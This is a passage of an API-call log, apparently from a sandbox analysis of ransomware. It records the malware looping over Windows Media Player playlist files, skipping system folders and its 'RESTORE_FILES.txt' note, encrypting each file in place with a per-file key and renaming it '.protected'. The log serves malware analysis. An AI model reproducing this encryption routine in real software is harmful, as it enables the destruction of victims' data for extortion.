[0084.964] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0084.964] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0084.964] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\07_TV_recorded_in_the_last_week.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\07_tv_recorded_in_the_last_week.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0084.965] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\07_TV_recorded_in_the_last_week.wpl") returned 136 [0084.965] StrStrW (lpFirst="07_TV_recorded_in_the_last_week.wpl", lpSrch=".txt") returned 0x0 [0084.965] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\07_TV_recorded_in_the_last_week.wpl") returned 136 [0084.965] StrStrW (lpFirst="07_TV_recorded_in_the_last_week.wpl", lpSrch=".rar") returned 0x0 [0084.965] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\07_TV_recorded_in_the_last_week.wpl") returned 136 [0084.965] StrStrW (lpFirst="07_TV_recorded_in_the_last_week.wpl", lpSrch=".zip") returned 0x0 [0084.965] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x410, lpOverlapped=0x0) returned 1 [0084.966] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffbf0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.966] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x410, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x410, lpOverlapped=0x0) returned 1 [0084.966] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.967] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0084.967] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0084.967] CloseHandle (hObject=0x158) returned 1 [0084.967] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\07_TV_recorded_in_the_last_week.wpl.protected") returned 146 [0084.967] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\07_TV_recorded_in_the_last_week.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\07_tv_recorded_in_the_last_week.wpl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\07_TV_recorded_in_the_last_week.wpl.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\07_tv_recorded_in_the_last_week.wpl.protected")) returned 1 [0084.967] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0084.967] lstrcmpiW (lpString1="08_Video_rated_at_4_or_5_stars.wpl", lpString2="Windows") returned -1 [0084.967] lstrcmpiW (lpString1="08_Video_rated_at_4_or_5_stars.wpl", lpString2="Program Files") returned -1 [0084.967] lstrcmpiW (lpString1="08_Video_rated_at_4_or_5_stars.wpl", lpString2="Program Files (x86)") returned -1 [0084.967] lstrcmpiW (lpString1="08_Video_rated_at_4_or_5_stars.wpl", lpString2="$Recycle.bin") returned 1 [0084.967] lstrcmpiW (lpString1="08_Video_rated_at_4_or_5_stars.wpl", lpString2="System Volume Information") returned -1 [0084.968] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\08_Video_rated_at_4_or_5_stars.wpl") returned 135 [0084.968] StrStrIW (lpFirst="08_Video_rated_at_4_or_5_stars.wpl", lpSrch=".protected") returned 0x0 [0084.968] lstrcmpW (lpString1="08_Video_rated_at_4_or_5_stars.wpl", lpString2="RESTORE_FILES.txt") returned -1 [0084.968] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0084.968] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0084.968] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\08_Video_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\08_video_rated_at_4_or_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0084.969] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\08_Video_rated_at_4_or_5_stars.wpl") returned 135 [0084.969] StrStrW (lpFirst="08_Video_rated_at_4_or_5_stars.wpl", lpSrch=".txt") returned 0x0 [0084.969] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\08_Video_rated_at_4_or_5_stars.wpl") returned 135 [0084.969] StrStrW (lpFirst="08_Video_rated_at_4_or_5_stars.wpl", lpSrch=".rar") returned 0x0 [0084.969] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\08_Video_rated_at_4_or_5_stars.wpl") returned 135 [0084.969] StrStrW (lpFirst="08_Video_rated_at_4_or_5_stars.wpl", lpSrch=".zip") returned 0x0 [0084.969] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x3fc, lpOverlapped=0x0) returned 1 [0084.977] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffc04, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.977] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x3fc, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x3fc, lpOverlapped=0x0) returned 1 [0084.977] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.977] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0084.977] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0084.977] CloseHandle (hObject=0x158) returned 1 [0084.977] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\08_Video_rated_at_4_or_5_stars.wpl.protected") returned 145 [0084.978] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\08_Video_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\08_video_rated_at_4_or_5_stars.wpl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\08_Video_rated_at_4_or_5_stars.wpl.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\08_video_rated_at_4_or_5_stars.wpl.protected")) returned 1 [0084.979] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0084.979] lstrcmpiW (lpString1="09_Music_played_the_most.wpl", lpString2="Windows") returned -1 [0084.979] lstrcmpiW (lpString1="09_Music_played_the_most.wpl", lpString2="Program Files") returned -1 [0084.979] lstrcmpiW (lpString1="09_Music_played_the_most.wpl", lpString2="Program Files (x86)") returned -1 [0084.979] lstrcmpiW (lpString1="09_Music_played_the_most.wpl", lpString2="$Recycle.bin") returned 1 [0084.979] lstrcmpiW (lpString1="09_Music_played_the_most.wpl", lpString2="System Volume Information") returned -1 [0084.979] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\09_Music_played_the_most.wpl") returned 129 [0084.979] StrStrIW (lpFirst="09_Music_played_the_most.wpl", lpSrch=".protected") returned 0x0 [0084.979] lstrcmpW (lpString1="09_Music_played_the_most.wpl", lpString2="RESTORE_FILES.txt") returned -1 [0084.979] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0084.979] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0084.979] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\09_Music_played_the_most.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\09_music_played_the_most.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0084.980] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\09_Music_played_the_most.wpl") returned 129 [0084.980] StrStrW (lpFirst="09_Music_played_the_most.wpl", lpSrch=".txt") returned 0x0 [0084.980] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\09_Music_played_the_most.wpl") returned 129 [0084.980] StrStrW (lpFirst="09_Music_played_the_most.wpl", lpSrch=".rar") returned 0x0 [0084.980] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\09_Music_played_the_most.wpl") returned 129 [0084.980] StrStrW (lpFirst="09_Music_played_the_most.wpl", lpSrch=".zip") returned 0x0 [0084.980] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x401, lpOverlapped=0x0) returned 1 [0084.987] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffbff, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.987] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x401, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x401, lpOverlapped=0x0) returned 1 [0084.987] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.987] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0084.987] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0084.987] CloseHandle (hObject=0x158) returned 1 [0084.987] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\09_Music_played_the_most.wpl.protected") returned 139 [0084.987] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\09_Music_played_the_most.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\09_music_played_the_most.wpl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\09_Music_played_the_most.wpl.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\09_music_played_the_most.wpl.protected")) returned 1 [0084.988] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0084.988] lstrcmpiW (lpString1="10_All_Music.wpl", lpString2="Windows") returned -1 [0084.988] lstrcmpiW (lpString1="10_All_Music.wpl", lpString2="Program Files") returned -1 [0084.988] lstrcmpiW (lpString1="10_All_Music.wpl", lpString2="Program Files (x86)") returned -1 [0084.988] lstrcmpiW (lpString1="10_All_Music.wpl", lpString2="$Recycle.bin") returned 1 [0084.988] lstrcmpiW (lpString1="10_All_Music.wpl", lpString2="System Volume Information") returned -1 [0084.988] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\10_All_Music.wpl") returned 117 [0084.988] StrStrIW (lpFirst="10_All_Music.wpl", lpSrch=".protected") returned 0x0 [0084.988] lstrcmpW (lpString1="10_All_Music.wpl", lpString2="RESTORE_FILES.txt") returned -1 [0084.988] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0084.988] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0084.988] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\10_All_Music.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\10_all_music.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0084.988] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\10_All_Music.wpl") returned 117 [0084.988] StrStrW (lpFirst="10_All_Music.wpl", lpSrch=".txt") returned 0x0 [0084.988] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\10_All_Music.wpl") returned 117 [0084.988] StrStrW (lpFirst="10_All_Music.wpl", lpSrch=".rar") returned 0x0 [0084.988] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\10_All_Music.wpl") returned 117 [0084.988] StrStrW (lpFirst="10_All_Music.wpl", lpSrch=".zip") returned 0x0 [0084.988] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x427, lpOverlapped=0x0) returned 1 [0084.996] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffbd9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.996] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x427, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x427, lpOverlapped=0x0) returned 1 [0084.996] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.996] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0084.996] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0084.996] CloseHandle (hObject=0x158) returned 1 [0084.996] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\10_All_Music.wpl.protected") returned 127 [0084.996] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\10_All_Music.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\10_all_music.wpl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\10_All_Music.wpl.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\10_all_music.wpl.protected")) returned 1 [0084.997] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0084.997] lstrcmpiW (lpString1="11_All_Pictures.wpl", lpString2="Windows") returned -1 [0084.997] lstrcmpiW (lpString1="11_All_Pictures.wpl", lpString2="Program Files") returned -1 [0084.997] lstrcmpiW (lpString1="11_All_Pictures.wpl", lpString2="Program Files (x86)") returned -1 [0084.997] lstrcmpiW (lpString1="11_All_Pictures.wpl", lpString2="$Recycle.bin") returned 1 [0084.997] lstrcmpiW (lpString1="11_All_Pictures.wpl", lpString2="System Volume Information") returned -1 [0084.997] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\11_All_Pictures.wpl") returned 120 [0084.997] StrStrIW (lpFirst="11_All_Pictures.wpl", lpSrch=".protected") returned 0x0 [0084.997] lstrcmpW (lpString1="11_All_Pictures.wpl", lpString2="RESTORE_FILES.txt") returned -1 [0084.997] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0084.997] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0084.997] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\11_All_Pictures.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\11_all_pictures.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0084.998] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\11_All_Pictures.wpl") returned 120 [0084.998] StrStrW (lpFirst="11_All_Pictures.wpl", lpSrch=".txt") returned 0x0 [0084.998] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\11_All_Pictures.wpl") returned 120 [0084.998] StrStrW (lpFirst="11_All_Pictures.wpl", lpSrch=".rar") returned 0x0 [0084.998] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\11_All_Pictures.wpl") returned 120 [0084.998] StrStrW (lpFirst="11_All_Pictures.wpl", lpSrch=".zip") returned 0x0 [0084.998] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x249, lpOverlapped=0x0) returned 1 [0084.999] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffdb7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.999] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x249, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x249, lpOverlapped=0x0) returned 1 [0084.999] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.999] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0084.999] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0084.999] CloseHandle (hObject=0x158) returned 1 [0085.000] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\11_All_Pictures.wpl.protected") returned 130 [0085.000] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\11_All_Pictures.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\11_all_pictures.wpl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\11_All_Pictures.wpl.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\11_all_pictures.wpl.protected")) returned 1 [0085.000] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0085.000] lstrcmpiW (lpString1="12_All_Video.wpl", lpString2="Windows") returned -1 [0085.000] lstrcmpiW (lpString1="12_All_Video.wpl", lpString2="Program Files") returned -1 [0085.000] lstrcmpiW (lpString1="12_All_Video.wpl", lpString2="Program Files (x86)") returned -1 [0085.000] lstrcmpiW (lpString1="12_All_Video.wpl", lpString2="$Recycle.bin") returned 1 [0085.000] lstrcmpiW (lpString1="12_All_Video.wpl", lpString2="System Volume Information") returned -1 [0085.000] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\12_All_Video.wpl") returned 117 [0085.000] StrStrIW (lpFirst="12_All_Video.wpl", lpSrch=".protected") returned 0x0 [0085.000] lstrcmpW (lpString1="12_All_Video.wpl", lpString2="RESTORE_FILES.txt") returned -1 [0085.000] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0085.000] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0085.000] 